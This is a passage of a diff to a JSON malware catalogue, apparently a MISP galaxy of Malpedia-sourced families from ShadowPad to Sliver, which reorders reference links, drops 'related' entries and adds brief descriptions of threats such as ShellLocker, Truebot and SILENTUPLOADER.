"https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf",
- "https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
+ "https://www.secureworks.com/research/shadowpad-malware-analysis",
+ "https://community.riskiq.com/article/d8b749f2",
+ "https://thehackernews.com/2022/02/researchers-link-shadowpad-malware.html",
+ "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf",
+ "https://medium.com/insomniacs/its-a-bee-it-s-a-no-it-s-shadowpad-aff6a970a1c2",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf",
"https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf",
+ "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
+ "https://www.youtube.com/watch?v=55kaaMGBARM",
+ "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "https://www.ic3.gov/Media/News/2021/211220.pdf",
+ "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/",
+ "https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/",
+ "https://securelist.com/shadowpad-in-corporate-networks/81432/",
+ "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/",
+ "https://www.theregister.com/2022/04/08/china_sponsored_attacks_india_ukraine/",
+ "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/",
+ "https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf",
+ "https://www.youtube.com/watch?v=r1zAVX_HnJg",
+ "https://www.youtube.com/watch?v=IRh6R8o1Q7U",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
+ "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://therecord.media/redecho-group-parks-domains-after-public-exposure/",
+ "https://labs.sentinelone.com/shadowpad-a-masterpiece-of-privately-sold-malware-in-chinese-espionage/",
+ "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
"https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
- "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html",
- "https://www.theregister.com/2022/04/08/china_sponsored_attacks_india_ukraine/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/",
- "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/",
- "https://attack.mitre.org/groups/G0096",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
- "https://www.youtube.com/watch?v=IRh6R8o1Q7U",
+ "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns",
"https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf",
"https://www.youtube.com/watch?v=_fstHQSK-kk",
- "https://hub.dragos.com/hubfs/333%20Year%20in%20Review/2021/2021%20ICS%20OT%20Cybersecurity%20Year%20In%20Review%20-%20Dragos%202021.pdf",
- "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf"
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
+ "https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf",
+ "https://research.nccgroup.com/2022/09/30/a-glimpse-into-the-shadowy-realm-of-a-chinese-apt-detailed-analysis-of-a-shadowpad-intrusion/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
+ "https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
+ "https://go.recordedfuture.com/hubfs/reports/ta-2022-0406.pdf",
+ "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
+ "https://www.welivesecurity.com/2022/09/06/worok-big-picture/"
],
"synonyms": [
"POISONPLUG.SHADOW",
@@ -41378,15 +43613,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "2448a4e1-46e3-4c42-9fd1-f51f8ede58c1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7",
"value": "ShadowPad"
},
@@ -41395,8 +43621,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti",
- "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/",
- "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/"
+ "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/"
],
"synonyms": [],
"type": []
@@ -41443,15 +43669,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "9ea6d29e-00a7-4042-9bc5-31b1adeee6ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d00c8f94-d6b5-40b7-b167-fc546c5dec38",
"value": "Shark"
},
@@ -41481,15 +43698,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "203fd529-6382-417e-a68f-7565fbf89ece",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43",
"value": "SHARPKNOT"
},
@@ -41553,7 +43761,7 @@
"value": "ShellClient RAT"
},
{
- "description": "",
+ "description": "PCRIsk states that ShellLocker is a ransomware-type virus developed using .NET framework. It was first discovered by Jakub Kroustek and is virtually identical to another ransomware virus called Exotic.\r\n\r\nFollowing infiltration, this virus encrypts stored data (video, audio, etc.) and renames encrypted files using the \"[random_characters].L0cked\" pattern (e.g., \"sample.jpg\" might be renamed to \"gd&=AA0fgoi.L0cked\"). Following successful encryption, ShellLocker opens a pop-up window containing ransom-demand message.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker",
@@ -41570,26 +43778,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/",
+ "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://intel471.com/blog/a-brief-history-of-ta505",
- "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/",
- "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "67d712c8-d254-4820-83fa-9a892b87923b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3",
"value": "Shifu"
},
@@ -41598,8 +43797,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat",
- "https://www.secureworks.com/research/threat-profiles/bronze-walker",
- "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf"
+ "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-walker"
],
"synonyms": [],
"type": []
@@ -41612,8 +43811,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
],
"synonyms": [],
"type": []
@@ -41652,14 +43851,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock",
- "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/",
- "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw",
- "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
- "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html",
"https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware",
- "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/"
+ "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw",
+ "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/",
+ "https://www.zscaler.com/blogs/security-research/new-wave-win32caphaw-attacks-threatlabz-analysis",
+ "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/",
+ "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/",
+ "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html"
],
"synonyms": [
"Caphaw"
@@ -41688,8 +43888,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk",
"https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
- "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf"
+ "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware"
],
"synonyms": [
"ScrambleCross"
@@ -41704,15 +43904,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder",
- "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html",
- "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
- "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c",
+ "https://www.secrss.com/articles/26507",
"https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/",
"https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c",
- "https://s.tencent.com/research/report/479.html",
- "https://www.secrss.com/articles/26507",
+ "https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/",
+ "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html",
"https://s.tencent.com/research/report/659.html",
- "https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/"
+ "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
+ "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c",
+ "https://s.tencent.com/research/report/479.html"
],
"synonyms": [],
"type": []
@@ -41726,7 +43926,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_blue",
"https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware",
- "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/"
+ "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/",
+ "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF"
],
"synonyms": [
"H0lyGh0st",
@@ -41743,7 +43944,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sienna_purple",
"https://blogs.blackberry.com/en/2022/08/h0lygh0st-ransomware",
- "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/"
+ "https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/",
+ "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF"
],
"synonyms": [
"H0lyGh0st",
@@ -41759,14 +43961,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware",
- "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
- "https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4",
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
- "https://www.us-cert.gov/ncas/alerts/TA14-353A"
+ "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4",
+ "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
+ "https://www.us-cert.gov/ncas/alerts/TA14-353A",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.secureworks.com/research/threat-profiles/nickel-academy",
+ "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware"
],
"synonyms": [
"Destover"
@@ -41776,6 +43979,21 @@
"uuid": "da92c927-9b31-48aa-854a-8ed49a29565b",
"value": "Sierra(Alfa,Bravo, ...)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siesta_graph",
+ "https://www.elastic.co/de/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph",
+ "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry",
+ "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a4f4464a-a8d6-4244-af0a-4a8163ab9f47",
+ "value": "SiestaGraph"
+ },
{
"description": "",
"meta": {
@@ -41788,6 +44006,19 @@
"uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8",
"value": "Siggen6"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sigloader",
+ "https://www.lac.co.jp/lacwatch/report/20201201_002363.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "48bf4991-4743-404a-aac1-72855b30e225",
+ "value": "SigLoader"
+ },
{
"description": "",
"meta": {
@@ -41802,41 +44033,52 @@
"value": "sihost"
},
{
- "description": "",
+ "description": "According to PCrisk, Truebot, also known as Silence.Downloader, is a malicious program that has botnet and loader/injector capabilities. This malware can add victims' devices to a botnet and cause chain system infections (i.e., download/install additional malicious programs/components).\r\n\r\nThere is significant variation in Truebot's infection chains and distribution. It is likely that the attackers using this malicious software will continue to make such changes.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.silence",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf",
"https://securelist.com/the-silence/83009/",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "http://www.intezer.com/silenceofthemoles/",
+ "https://github.com/Tera0017/TAFOF-Unpacker",
+ "https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/",
+ "https://securityintelligence.com/posts/x-force-prevents-zero-day-from-going-anywhere",
"https://reaqta.com/2019/01/silence-group-targeting-russian-banks/",
"https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
"https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf",
- "https://github.com/Tera0017/TAFOF-Unpacker",
- "https://www.youtube.com/watch?v=FttiysUZmDw",
- "https://www.group-ib.com/resources/threat-research/silence.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf",
+ "https://malware.love/malware_analysis/reverse_engineering/2023/03/31/analyzing-truebot-capabilities.html",
+ "https://malware.love/malware_analysis/reverse_engineering/2023/02/12/analyzing-truebot-packer.html",
+ "http://www.intezer.com/silenceofthemoles/",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits",
+ "https://malware.love/malware_analysis/reverse_engineering/2023/02/18/analyzing-truebot-static-unpacking.html",
"https://norfolkinfosec.com/some-notes-on-the-silence-proxy/",
- "https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/"
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.group-ib.com/resources/threat-research/silence.html",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/"
],
"synonyms": [
"TrueBot"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "304fd753-c917-4008-8f85-81390c37a070",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "0df52c23-690b-4703-83f7-5befc38ab376",
"value": "Silence"
},
+ {
+ "description": "According to Mandiant, SILENTUPLOADER is an uploader written in MSIL that is dropped by DOSTEALER and is designed to work specifically in tandem with it. It checks for files in a specified folder every 30 seconds and uploads them to a remote server.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silentuploader",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3ed237f1-35b9-4e74-a37e-966bf023d136",
+ "value": "SILENTUPLOADER"
+ },
{
"description": "",
"meta": {
@@ -41901,14 +44143,14 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.recordedfuture.com/turla-apt-infrastructure/",
- "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
- "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan",
+ "https://en.wikipedia.org/wiki/Torpig",
+ "https://www.recordedfuture.com/turla-apt-infrastructure/",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
"https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/",
- "https://en.wikipedia.org/wiki/Torpig"
+ "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan",
+ "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf",
+ "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2"
],
"synonyms": [
"Anserin",
@@ -41928,8 +44170,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/",
- "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4"
+ "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/"
],
"synonyms": [],
"type": []
@@ -41984,15 +44226,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper",
- "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf",
- "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
- "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
- "https://www.secureworks.com/research/threat-profiles/iron-hunter",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/",
+ "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf",
"https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender-Whitepaper-PAC-A4-en_EN1.pdf",
- "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/"
+ "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/"
],
"synonyms": [
"Kotel"
@@ -42014,6 +44256,19 @@
"uuid": "39002a0d-99aa-4568-b110-48f6df1759cd",
"value": "Skyplex"
},
+ {
+ "description": "Ransomware.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slam",
+ "https://www.sentinelone.com/blog/from-the-front-lines-slam-anatomy-of-a-publicly-available-ransomware-builder/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "400e437d-13b3-44d9-8f75-34f5e82d6c88",
+ "value": "Slam"
+ },
{
"description": "",
"meta": {
@@ -42042,14 +44297,14 @@
"value": "SLICKSHOES"
},
{
- "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer",
+ "description": "- 2012 first sighted\r\n- Attack vector via compromised Mikrotik routers where victims get infection when they connect to Mikrotik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Mikrotik Router > Malicious DLL (IP4.dll) in Router > User connect via winbox > Malicious DLL downloaded on computer",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot",
"https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
"https://securelist.com/apt-slingshot/84312/",
- "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf",
- "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/"
+ "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/",
+ "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf"
],
"synonyms": [],
"type": []
@@ -42058,17 +44313,23 @@
"value": "Slingshot"
},
{
- "description": "",
+ "description": "According to VK9 Seecurity, Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver",
- "https://github.com/BishopFox/sliver",
- "https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf",
- "https://www.telsy.com/download/5900/?uid=b797afdcfb",
- "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
"https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks",
- "https://team-cymru.com/blog/2022/04/29/sliver-case-study-assessing-common-offensive-security-tools/"
